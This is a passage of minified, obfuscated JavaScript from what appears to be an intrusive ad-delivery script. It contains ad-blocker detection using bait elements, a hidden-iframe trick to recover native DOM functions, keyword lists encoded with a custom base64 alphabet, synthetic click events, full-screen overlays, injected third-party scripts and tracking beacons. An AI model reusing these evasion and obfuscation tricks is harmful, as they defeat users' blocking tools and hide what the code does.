h=b(f.children);5>h.length||.8<c(h)&&(a=a.replace(f.innerText.toLowerCase(),""))}}}catch(g){}return a}function Ra(a){return a.replace(/[^a-z0-9\s\t\n\r]/ig," ").split(/[\s\t\n\r]/g)} function id(){var a=[];wc().L(function(b,c){1<c&&3<b.length&&15>b.length&&a.push([b,c])});a.sort(function(a,b){return a[1]==b[1]?0:a[1]>b[1]?1:-1});for(var b=a.slice(0,20),c=[],d=0;d<b.length;d++)c.push(b[d][0]);return c.join(" ")}function wc(){var a=new aa,b={"name='description'":!0,"name='keywords'":!0,"property='og:title'":!0,"property='og:description'":!0},c=f.document.title;c.length&&xc(c,a);for(var d in b)try{var e=m.querySelector("meta["+d+"]");if(e){var k=e.getAttribute("content");xc(k,a)}}catch(h){q(p.vc, "error in keyword selector: "+d+", "+h)}return a}function xc(a,b){for(var c=Ra(a),d=0;d<c.length;d++){var e=c[d];e&&0<e.length&&b.a(e.toLowerCase())}}function jd(a){try{var b=m.querySelector("meta[name='"+a+"']");if(b&&b.content)return b.content}catch(c){q(p.m,"error in extracting subid: "+c)}return null}function kd(a){try{var b=a.mode;if(b){if(b&&"selector"!=b&&"url"!=b)throw Error("extract name function mode: "+b+" is not valid");var c,d;if("url"==b)if(1==a.url_query_string){var e,k=m.createElement("a"); k.href=f.location.href;d=(e=tc(k.search))?e[a.url_query_string_param]:""}else{for(var h=f.location.pathname.split("/"),g=[],x=0;x<h.length;x++)""!=h[x]&&g.push(h[x]);d=g[a.url_param_location-1]}else h="",(g=m.querySelector(a.selector))&&(x=B.Ib(g))&&(h=x?x.trim():""),d=h;a.url_separator&&(d=d.replace(new RegExp(a.url_separator,"g")," "));if(a.remove_filename_extension){var l=d.lastIndexOf(".");if(-1<l){var n=d.substring(0,l);0<n.length&&(d=n)}}c=d;if(!c){var u=T.X(yc);if(u){a="";var v=B.Ba(u,"a"); if(v){var l="",A=B.Ib(v);A&&(l=A?A.trim():"");a=l;if(!a){var F=B.Ba(u,"img");if(F){var z=F.alt;a=z?z.trim():""}}}c=a}}return c}return""}catch(C){q(p.m,"error in extracting file name: "+C)}}function nb(a){a&&a.parentNode&&a.parentNode.removeChild(a)}function aa(){this.b={}}function Xc(a,b){tb?ld(function(a){a?q(p.fc,void 0):q(p.zc,void 0);b(a)},a):b(!1)}function zc(a,b){var c=m.createElement("img");c.onerror=function(){a(!0)};c.onload=function(){a(!1)};c.src=b}function Ab(a,b,c,d,e){var f;c=c||0;if(!e){f= m.getElementsByTagName("body")[0];if(!f){zc(b,d);return}e=m.createElement("div");f.appendChild(e);e.innerHTML="test";e.style.position="absolute";e.style.left="-200px";e.className=a}var h=e;C(function(){"none"===Bb(h,"display","display")||"hidden"===Bb(h,"visibility","visibility")||0===h.offsetWidth||0===h.offsetHeight?(b(!0),h.parentNode.removeChild(h)):5>c?C(function(){Ab(a,b,c+1,d,h)},20):(zc(b,d),h.parentNode.removeChild(h))},50)}function ld(a,b){var c="isAd contentad google_ad googleAdsense googleAd300x250 insertad header-ad-wrapper homeAd homeAd2 iframe-ads item-advertising leaderAdvert horizontalAd horizontal_ads idGoogleAdsense".split(" "); Ab(c[Math.floor(Math.random()*c.length)],function(d){d?Ab(c[Math.floor(Math.random()*c.length)],a,1,b):a(!1)},0,b)}function dc(a){var b=0;Ac=a[b++];Bc=a[b++];Ca=a[b++];Cc=a[b++];ka=a[b++];Dc=a[b++];b++;Ec=a[b++];Oa=a[b++];b++;Fc=a[b++]||[];fb=a[b++]||0;Cb=(J=a[b++]||[],0<J.length)?J.join(", "):"";ha=a[b++]||[];var c;if(ha&&0<ha.length){c=ha;for(var d=c.length,e=c.slice(),f=0;f<d;f++)e.push(c[f]+" *");c=e.join(", ")}else c="";na=c;Gc=a[b++];b++;Hc=a[b++];Pb=a[b++];b++;fa=a[b++];pb=a[b++];lb=(A=a[b++]|| [],0<A.length)?A.join(", "):"";b++;Ob=a[b++];bc=a[b++];Ic=a[b++];b++;ec=a[b++]||[];Sa=a[b++];Mb=a[b++];Jc=a[b++];b++;b++;cb=a[b++]||"";jb=a[b++]||"";oa=a[b++]||[];b++;xb=a[b++];Db=a[b++];b++;Xb=a[b++];Eb=a[b++];Fb=a[b++];Kc=a[b++];db=a[b++];qb=a[b++];kb=a[b++];Zb=a[b++];Wb=a[b++];rb=a[b++];sb=a[b++];M.Z(Yb)}function ya(a){a=a.toString().replace(/[^A-Za-z0-9\+\/]/g,"");for(var b="",c=0;c<a.length;){var d=za(Aa(a,c++)),e=za(Aa(a,c++)),f=za(Aa(a,c++)),h=za(Aa(a,c++)),g=(e&15)<<4|f>>2,m=(f&3)<<6|h,b= b+ba(d<<2|e>>4);64!=f&&0<g&&(b+=ba(g));64!=h&&0<m&&(b+=ba(m))}a=b;b="";for(c=0;c<a.length;)d=a.charCodeAt(c),128>d?(b+=ba(d),c++):191<d&&224>d?(b+=ba((d&31)<<6|a.charCodeAt(c+1)&63),c+=2):(b+=ba((d&15)<<12|(a.charCodeAt(c+1)&63)<<6|a.charCodeAt(c+2)&63),c+=3);return b}function za(a){return"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/".indexOf(a)}function Aa(a,b){return a.charAt(b)}function Wc(a,b,c){var d;d="GET";var e=new XMLHttpRequest;e.open(d,a,!0);e.onreadystatechange=function(){if(e.readyState== md){e.ontimeout=function(){};k&&(f.clearTimeout(k),k=!1);var a=e.responseText.trim();200==e.status||204==e.status||205==e.status?b(a,e.status):c(a,e.status)}};var k;e.withCredentials=!1;e.send("")}function q(a,b){if(2!=a[1]&&4!=a[1]&&3!=a[1]){if(b&&a[0]==p.m[0]){var c=b;if(Lc.b(c))return;Lc.a(c)}ia.send.apply(ia,arguments)}}function nd(a){var b;b=b||function(){};try{if(ia.j.a==Q.ca&&f.navigator.sendBeacon){f.navigator.sendBeacon(a);b();return}}catch(d){}var c=new Image;c.onerror=c.onload=b;c.src= a}function Mc(a){var b,c,d,e;l.b()&&9>l.a(v.aa)?(e=m.documentElement,b=e.clientWidth,c=e.clientHeight,d=e.offsetWidth,e=e.offsetHeight):(b=window.innerWidth,c=window.innerHeight,d=window.outerWidth,e=window.outerHeight);return b/d>a&&c/e>a}function ab(){var a=!1;try{a=f.top!==f.self}catch(b){return!0}return a}function gb(a,b){a();od(a,b)}function Gb(a,b){var c=!1;a&&(c=a.tagName.toLowerCase()==b);return c}function sa(a){return"<script>"+a+"\x3c/script>"}function hb(a,b){return"<html><head>"+(a?a: "")+"</head><body>"+(b?b:"")+"</body></html>"}function pd(){var a=new z;if(l.c()){if(l.w())return a.a(Hb()),a;if(l.R())return a.a("touchstart"),a.a("click"),a.a("dblclick"),a.a("touchend"),a.a("touchcancel"),a;if(l.D())return l.chrome()&&62<=l.a(v.chrome)?a.a("mouseup"):(a.a("dblclick"),a.a("mouseup"),a.a("touchend")),a;a.a(Hb());return a}a.a(Hb());return a}function Hb(){return l.chrome()?"mousedown":"click"}function Bb(a,b,c){if(window.getComputedStyle)return f.document.defaultView.getComputedStyle(a, null).getPropertyValue(b);if(a.currentStyle)return a.currentStyle[b]||a.currentStyle[c]}function $b(){try{var a,b=navigator.languages;if(b){for(var c=[],d=0;d<b.length;d++)(a=b[d])&&-1==a.indexOf("en")&&c.push(a);return c.join(",")}return(a=navigator.language||navigator.a)&&-1==a.indexOf("en")?a:""}catch(e){return""}}function Ub(a){return"data:text/html;base64,"+btoa("<html><body><script>"+a+"\x3c/script></body></html>")}function Sb(a,b){for(var c in b)a.setAttribute(c,b[c]);return a}function ja(a){var b= m.createElement("a");b.href=a;return b.hostname}function Nc(a,b){"undefined"==typeof Ib[a]&&(Ib[a]=b());return Ib[a]}function Nb(a){for(var b=-1,c=0;c<a.length;c++)var d=qd[(a.charCodeAt(c)^b)&255],b=b>>>8,b=b^d;return(b^-1)>>>0}function u(){for(var a=yb();Oc.b(a);)a=yb();Oc.a(a);return a}function z(){this.c={}}function ub(a){return a&&0!=a?1==a?!0:a>=Math.random():!1}function yb(){return Ha(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")+Ha(Math.floor(8*Math.random())+8)}function Ha(a, b){b=b||"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";for(var c="",d=b.length,e=0;e<a;e++)c+=b.charAt(Math.floor(Math.random()*d));return c}function la(){return(new Date).getTime()}function Pc(a,b,c){function d(a,b){a&&a.charAt(0)!=b&&(a=b+a);return a||""}return"//"+a+encodeURI(d(b,"/"))+d(c,"?")+d(void 0,"#")}function tc(a){var b={};if(a=a.substring(1)){a=a.split("&");for(var c=0;c<a.length;c++)if(0<a[c].length){var d=a[c].split("=");b[d[0]]=decodeURIComponent(d[1]||"")}}return b} function cc(a){var b=[],c;for(c in a)a.hasOwnProperty(c)&&b.push([c,encodeURIComponent(a[c])].join("="));return b.join("&")}z.prototype.remove=function(a){delete this.c[a];return this};z.prototype.b=function(a){return this.c[a]};z.prototype.a=function(a){this.c[a]=!0};z.prototype.L=function(a){var b=this.c,c;for(c in b)if(null===a(c))break};z.a=function(a){if("function"!=typeof a.push)throw Error("please provide an array of T");for(var b=new z,c=0;c<a.length;c++)b.a(a[c]);return b};var Oc=new z,qd= function(a){for(var b=[],c,d=0;256>d;d++){c=d;for(var e=0;8>e;e++)c&1?(c>>>=1,c^=a):c>>>=1;b[d]=c}return b}(3988292384),E=navigator.userAgent.toLowerCase(),Ib={},v={ke:0,Ud:1,je:2,Vd:3,V:4,rc:5,aa:6,Lc:7,Ka:8,Jc:9,Ac:10,Bc:11,VERSION:12,Pd:13,Od:14,wc:15,Cc:16,sc:17},l=new function(){this.S=function(){return/windows/.test(E)};this.s=function(){return/macintosh/.test(E)};this.chrome=function(){return(/chrome/.test(E)||/crios/.test(E))&&!/edge/.test(E)};this.b=function(){return/msie|trident\//.test(E)&& !/opera/.test(E)};this.R=function(){return/uc(web|browser)/.test(E)};this.l=function(){return/firefox/.test(E)};this.C=function(){return/safari/.test(E)&&!this.chrome()};this.P=function(){return/titan/.test(E)};this.a=function(a){return Nc(v.VERSION,function(){var b=[];switch(a){case v.rc:b=[/edge\/([0-9]+(?:\.[0-9a-z]+)*)/];break;case v.Lc:b=[/uc\s?browser\/?([0-9]+(?:\.[0-9a-z]+)*)/,/ucweb\/?([0-9]+(?:\.[0-9a-z]+)*)/];break;case v.wc:b=[/iemobile[\/\s]([0-9]+(?:\.[0-9a-z]+)*)/];break;case v.Bc:b= [/opera mini\/([0-9]+(?:\.[_0-9a-z]+)*)/];break;case v.Cc:b=[/opera\/[0-9\.]+(?:.*)version\/([0-9]+\.[0-9a-z]+)/];break;case v.Ac:b=[/opera\/[0-9\.]+(?:.*)version\/([0-9]+\.[0-9a-z]+)/,/opera[\s/]([0-9]+\.[0-9a-z]+)/];break;case v.aa:b=[/trident\/(?:[1-9][0-9]+\.[0-9]+[789]\.[0-9]+|).*rv:([0-9]+\.[0-9a-z]+)/,/msie\s([0-9]+\.[0-9a-z]+)/];break;case v.V:b=[/(?:chrome|crios)\/([0-9]+(?:\.[0-9a-z]+)*)/];break;case v.Ka:b=[/(?:firefox)\/([0-9]+(?:\.[0-9a-z]+)*)/];break;case v.Jc:b=[/(?:safari)\/([0-9]+(?:\.[0-9a-z]+)*)/]}for(var c= 0,d=b.length;c<d;c++){var e=E.match(b[c]);if(e&&e[1])return parseFloat(e[1])}return 0})};this.ga=function(){return(this.S()||this.s()||this.O()&&!this.D())&&!/mobi/.test(E)};this.c=function(){return!this.ga()};this.M=function(){return/iphone/.test(E)};this.D=function(){return/android/.test(E)};this.O=function(){return/linux/.test(E)};this.K=function(){return/ipad/.test(E)};this.w=function(){return this.K()||this.M()};this.N=function(){return Nc(v.sc,function(){try{return new ActiveXObject("ShockwaveFlash.ShockwaveFlash"), !0}catch(a){return navigator.mimeTypes["application/x-shockwave-flash"]&&navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin}})}},n={Ga:[],o:function(a,b,c,d,e){window.addEventListener?(d.addEventListener(a,b,c),e||n.Ga.push([a,b,c,d])):window.attachEvent&&(d["e"+a+b]=b,d[a+b]=function(){if(d["e"+a+b])d["e"+a+b](window.event)},d.attachEvent("on"+a,d[a+b]),e||n.Ga.push([a,b,c,d]))},F:function(a,b,c,d){window.removeEventListener?d.removeEventListener(a,b,c):window.detachEvent&&(d.detachEvent("on"+ a,d[a+b]),d[a+b]=null,d["e"+a+b]=null)},Tc:function(){for(var a=n.Ga,b=a.length,c=0;c<b;c++)try{n.F.apply(null,a[c])}catch(d){}n.Ga=[]},Ne:function(a){a.cancelBubble=!0;a.stopPropagation&&a.stopPropagation()},yd:function(a){a.cancelBubble=!0;a.Ae=!1;a.stopImmediatePropagation&&a.stopImmediatePropagation()},od:function(a){a.returnValue=!1;a.preventDefault&&a.preventDefault()},ea:function(a){if(f.document.body)a();else if(window.jQuery)window.jQuery(f.document).ready(a);else{var b=function(){n.F("DOMContentLoaded", b,!0,f.document);n.F("load",b,!0,f);f.document.body?a():n.ea(a)};if(n.Fb()||"loading"!==f.document.readyState&&!f.document.documentElement.doScroll){var c=function(){f.document.body?b():C(c,5)};C(c,5)}else n.o("DOMContentLoaded",b,!0,f.document,!1),n.o("load",b,!0,f,!1)}},fd:function(a,b,c,d,e){var k;b={bubbles:!0,cancelable:"mousemove"!=a,view:window,detail:0,screenX:b,screenY:c,clientX:d,clientY:e,ctrlKey:!1,altKey:!1,shiftKey:!1,metaKey:!1,button:0,relatedTarget:void 0};if("function"==typeof f.document.createEvent)k= m.createEvent("MouseEvents"),k.initMouseEvent(a,b.bubbles,b.cancelable,b.view,b.detail,b.screenX,b.screenY,b.clientX,b.clientY,b.ctrlKey,b.altKey,b.shiftKey,b.metaKey,b.button,f.document.body.parentNode);else if(f.document.createEventObject){k=m.createEventObject();for(var h in b)k[h]=b[h];k.button={0:1,1:4,2:2}[k.button]||k.button}return k},Z:function(a,b){f.document.dispatchEvent?b.dispatchEvent(a):f.document.fireEvent&&b.fireEvent("on"+a.type,a)},Rc:function(a){a=a||f.event;var b=a.pageX,c=a.pageY; "undefined"==typeof b&&(b=(a.clientX||a.screenX)+(m.body.scrollLeft||0)+(m.documentElement.scrollLeft||0),c=(a.clientY||a.screenY)+(m.body.scrollTop||0)+(m.documentElement.scrollTop||0));return[b,c]},Fb:function(){return"complete"===f.document.readyState}};l.b()&&l.a(v.aa);n.ud=function(a,b){try{l.chrome()&&(window.oncontextmenu=a,n.o("click",function(b){var d=b||window.event,e;"contextmenu"==d.type?e=!0:"which"in d?e=3==d.which:"button"in d&&(e=2==d.button);e&&a(b)},!0,b))}catch(c){q(p.m,""+c)}}; var f=window,C=f.setTimeout,od=f.setInterval,eb=window.open,m=f.document;try{if((!l.b()||l.b()&&8<l.a(v.aa))&&-1==(m.querySelectorAll+"").toString().toLowerCase().indexOf("native code")){var pa=m.createElement("iframe");pa.style.display="none";n.ea(function(){m.body.appendChild(pa);m={};for(var a in pa.contentDocument)try{var b=pa.contentDocument[a];switch(typeof b){case "function":m[a]=(new function(a){this.call=function(){return a.apply(f.document,arguments)}}(pa.contentDocument[a])).call;break; default:m[a]=b}}catch(c){}})}}catch(a){}var Wa=u();u();var Ka={},Va={Sb:function(a,b){Ka[a]?Ka[a].push(b):b()},create:function(a){Ka[a]=[]},release:function(a){var b=Ka[a];if(b)for(var c=0;c<b.length;c++)b[c]();delete Ka[a]}},p={N:[0,0],Dc:[1,0],Oa:[2,0],wb:[3,0],m:[4,1],ba:[5,0],Je:[6,3],Md:[7,4],Te:[8,3],vb:[9,0],c:[10,3],b:[11,3],Xd:[12,4],P:[13,3],O:[14,3],tc:[15,0],R:[16,0],Wd:[17,0],Rd:[18,0],s:[19,0],l:[20,1],Ce:[21,0],Td:[22,3],fc:[23,0],vc:[24,3],ia:[25,3],w:[26,1],ye:[27,0],He:[28,0],le:[29, 0],we:[30,0],Fe:[31,0],Ge:[32,0],Ee:[33,0],De:[34,0],Be:[35,0],ne:[36,0],Dd:[37,0],me:[38,0],ve:[39,0],se:[40,0],xe:[41,0],oc:[42,0],pc:[43,0],Pe:[44,0],Qe:[45,0],Re:[46,0],ce:[47,0],Fd:[48,0],Oe:[49,0],Le:[50,0],uc:[51,1],Ke:[52,0],C:[53,1],ee:[54,0],nc:[55,0],jc:[56,0],a:[57,0],Gd:[58,0],gc:[59,0],hc:[60,0],ic:[61,0],zc:[62,0],Ec:[63,0],K:[64,0],D:[65,0],M:[66,0],sb:[67,0],xc:[68,0],rb:[69,0],be:[71,0],ub:[72,0],Zd:[73,0],de:[74,0],fe:[75,0],ha:[76,0],S:[77,0],Hc:[78,0],ga:[79,0],oe:[80,0],ue:[81, 0],Kd:[82,0],ie:[83,0],ge:[84,0],re:[85,0],qe:[86,0],Se:[87,0],Ic:[88,0],Nd:[89,0],ae:[90,0],Yd:[91,0],$d:[92,0],Sd:[93,0],he:[94,0],Qd:[95,0],va:[1E3,0],ob:[1001,0],pb:[1002,0],qb:[1003,0],ja:[1004,0],Jd:[1005,0],Id:[1006,0],Hd:[1007,0]},ia={j:null,send:function(a,b){try{"string"==typeof b&&0<b.length&&(b=b.replace(/[,\r\n]/g,"").slice(0,1024));var c=(new xa(ia.j.l,"/",!0)).h("cs",Ea(ia.j.c.Sa)).h("tid",ia.j.b).h("pid",ia.j.s).h("status",a[0]).h("info",b||"").h("v","1.34.9.1").h("tpag","1").h("pttl", la()).toString();nd(c)}catch(d){}}},Lc=new z,md=XMLHttpRequest.DONE||4,Jb=u(),bb=u(),wb=u();u();u();u();u();var Kb=u(),vb=u(),rd=u(),Yb=u();u();u();u();var Ba=f.document.documentElement,M={o:function(a,b){if(f.addEventListener)n.o(a,b,!0,Ba,!1);else if(f.attachEvent){var c=Ba,d=Jb+a;c[d]=0;c.attachEvent("onpropertychange",function(e){e=e||f.event;if(e.propertyName==d){e.detail=c[d];var k={},h;for(h in e)k[h]=e[h];k.type=a;b(k)}})}},F:function(a,b){if(f.removeEventListener)n.F(a,b,!0,Ba);else if(f.detachEvent){var c= Ba;c.detachEvent("onpropertychange",b);var d=Jb+a;c[d]=null;delete c[d]}},Z:function(a,b){if(f.document.dispatchEvent){var c=m.createEvent("CustomEvent");c.initCustomEvent(a,!0,!0,b);Ba.dispatchEvent(c)}else Ba[Jb+a]=b}},ba=String.fromCharCode,f=window,Ca,Cc,ka,Ec,Oa,Fc,fb,Pb,pb,Ob,ec,Sa,cb,jb,J,Cb,ha,na,Gc,Hc,fa,A,lb,bc,Ic,Jc,Mb,oa,xb,Db,Xb=0,Ac,Bc,Dc,Eb,Fb,Kc,db,qb,kb,Zb,Wb,rb,sb,zb={Pc:function(a){return a&&1==a.length},Db:function(a){return JSON.parse(ya(a))}},ob,Qc=zb.Pc(arguments);Qc?ob=zb.Db(arguments[0]): ob=arguments;dc(ob);M.Z(rd);var Q={ca:0,qc:1,lb:2,Ld:3,Na:4},tb=!l.c()&&(l.chrome()||l.l());aa.prototype.remove=function(a){delete this.b[a]};aa.prototype.a=function(a){this.c(a)};aa.prototype.c=function(a){var b=this.b;b[a]||(b[a]=0);b[a]+=1};aa.prototype.L=function(a){var b=this.b,c;for(c in b)if(null===a(c,b[c]))break};aa.a=function(a){if("function"!=typeof a.push)throw Error("please provide an array of T");for(var b=new aa,c=0;c<a.length;c++)b.a(a[c]);return b};var B={cd:function(a,b,c){if(a[b]== c)return a;if(!a.children||!a.children.length)return null;for(var d=0,e;d<a.children.length;d++)if(e=this.cd(a.children[d],b,c))return e;return null},xa:function(a){a=a.getBoundingClientRect();return{top:a.top,right:a.right,bottom:a.bottom,left:a.left,height:a.height,width:a.width}},Cd:function(a,b){b=b||this.xa(a);if(0>b.left+b.width||0>b.right+b.width||0>b.top+b.height||0>b.bottom+b.height)return!1;var c=a.style;return"hidden"==c.visibility||"none"==c.display?!1:!(!a.offsetWidth&&!a.offsetHeight)}, c:function(a,b){b.parentNode.insertBefore(a,b.nextSibling)},Vb:function(a,b){for(var c=[],d=0;d<a.length;d++){for(var e=!1,f=a[d],h=0;h<b.length;h++)if(f===b[h]){e=!0;break}e||c.push(f)}return c},Ea:function(a,b){for(var c=[],d=0;d<a.length;d++)for(var e=a[d],f=0;f<b.length;f++)if(e===b[f]){c.push(e);break}return c},ka:function(a){return m.elementFromPoint.apply(f.document,a)},Ib:function(a){return a.textContent},a:function(a,b){try{var c=m.createElement("script");c.src=b+"?tid="+a;m.getElementsByTagName("head")[0].appendChild(c)}catch(d){q(p.m, "exception in adding a another monetization: "+d)}},Hb:function(a,b){var c=m.createElement("a");c.setAttribute("href",a);c.setAttribute("target",b||"_blank");return c},Da:function(a,b){return"position:fixed !important;visibility:visible !important;left:0 !important;top:0 !important;width:"+a+"px !important;height:"+b+"px !important;z-index:2147483647 !important;overflow:hidden !important;"},Ba:function(a,b,c){for(b=b.toLowerCase();a&&"undefined"!=typeof a.tagName;){if(a.tagName.toLowerCase()==b&& (!c||c(a)))return a;a=a.parentNode}return null},Qb:function(a){return a?a.hostname==f.location.hostname:!1},b:function(a){return m.body.removeChild.call(f.document.body,a)},l:function(a,b){a.style.display=b?"block":"none"}};u();u();var sd=u();u();u();u();var td=u(),Rc=u(),yc=u(),Qa=u(),Lb={},T={X:function(a){return Lb[a]},oa:function(a,b){Lb[a]=b},zd:function(a){delete Lb[a]}},vc=[[],z.a(ya("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").split(";")), z.a(ya("gMVNsyxHCHJSAeCYgNl9DdJSAeCYhyVTAHJSAeCYDyV9CHJSAeDZC6r2gMVNgMxIBzr2gMVNgM0LgNr2gMVNg70TAHJSAeDUAeqRp7tPh74PCzbIhfr2gMVNDyV9CHJSgNC2gMFLD7PLgTJTAfm4C7l5p7q8g7JLByn2g6VShftEB6tKp7mPhyFLp7mPBymLp7mLBeVKgfmGAfY2hftLDyVTp7lGB6mPAHJVC7qLCNn2hfZLDyVTp7hPBMDVCMVKhHJMDeqRp7t8DzmEBzlNp7rGgHJMDfY2AyxKhyPLgTJRCy0GBM12BexHDzlGgMx9p78NCdJJBeg2B6tZBdJLCMDZC792B6tNAelHp70Gh6U2CylKAfr2Cy0GBNq9gfs2CzlHC6U2DyDEp6mLCyFVC6r2DMVSCMx9B6s2g7FZBfbHp7qIAe8ZWdJTByV9p7qLg7I2We08Cy0GBTJTDe8HAy09p7q8BfqOB6C2g6lKBMVIAe4NDfr2g6lKDdJUhelEDyZGB7x9p7mPg7I2hy08gMFVszbVBMl9CMx9Ae0Kp7mEp7mGhexJge8ZDyl8CNr2hzt9DetVCTJUWeJVp7m4ByxKBzlTgfr2g70UWeq8Be8PBMDHp7mLh7D4p7hPBMDVCMxHCHJ7B6VVDfs2DMVSCNmLCNr2DMlGAehPhenYge8ZDyl8CNr2C6mGgfbLBTJHhNC2Cy0GBTJEB6g2Byl3gMxPBTJOB6tKWjJOhcbEB6tKp7ZZAft4p7ZZAft4CzlHC6U2hNlTA78Zg7ZPBMk2h7xKh7tZBMC2h70KWM12DztZBM4Phfr=").split(";")), z.a(ya("gNlRA7xRhjJShzqJp7qZBelIDy0Vp7qMBM92hfZHDe4Zp7ZVBNmZAjJJCNq9AehMp7qGhexJCyVVp7qGhexJCyVVhdJMhe8UB792BeVIhTJ5WzY2C6VSAexKp6qOhe8ZByk2C6bZBMJ6AftVp7hPC6mPBMC2hM0LDyPLgTJHCflPCNn=").split(";"))],gd=[1,1,5,5],ta={Ya:function(a,b,c){try{return a.postMessage(b,c||"*"),!0}catch(d){return!1}},Ie:function(a,b,c){for(;a!=a.top;)a=a.parent,ta.Ya(a,b,c)},Yb:function(a,b,c,d,e,k){function h(b){n.F("message",h,!0,f);b.source===a&&(g&&clearTimeout(g),d(b[b.message?"message":"data"],b.source))}var g;n.o("message", h,!0,f);e&&0<e&&(g=C(function(){n.F("message",h,!0,f);k&&k()},e));return 